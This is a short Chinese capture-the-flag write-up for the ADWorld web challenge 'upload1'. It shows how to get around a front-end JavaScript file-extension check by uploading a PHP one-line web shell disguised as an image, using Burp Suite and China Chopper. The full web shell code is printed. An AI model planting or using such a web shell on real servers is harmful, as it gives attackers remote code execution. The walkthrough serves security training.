题型 : 文件上传

这个看题目就应该能反应过来了

攻防世界 web upload1
首先就给了一个上传界面,看一下源代码
攻防世界 web upload1
下半段只是一个普通的文件上传脚本,但是这里面有个check()函数,说明和上面的js函数有点关系就算你不会js(我也不会) 也应该能看懂:只能上传后缀名那俩个的文件。

其实这题很简单:先写一个一句话木马,然后后缀名修改成jpg或png。用burpsuite修改一下上传到它的服务器上,再用菜刀连接就行了

这题还简单在什么地方?这是一个js前端校验,也就是说:只要你能够欺骗成功前端,那么你就能上传一句话木马。
所以我们改包的时候这两个地方修改成这样就行了
攻防世界 web upload1
再发包:
攻防世界 web upload1
将上传路径复制到菜刀中
攻防世界 web upload1
这个c就是一句话木马中的c(可任意修改)

<?php @eval($_REQUEST['c']);?>

成功连上了
攻防世界 web upload1但是打开flag.txt的时候不显示任何东西?

攻防世界 web upload1

我也不知道是怎么回事,于是使用虚拟终端一顿操作
攻防世界 web upload1
get flag…

相关文章:

  • 2021-09-29
  • 2021-07-22
  • 2022-12-23
  • 2021-07-30
  • 2021-06-15
  • 2021-11-28
  • 2021-12-04
  • 2022-01-12
猜你喜欢
  • 2022-01-03
  • 2021-11-14
  • 2021-10-01
  • 2022-01-09
  • 2021-07-11
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案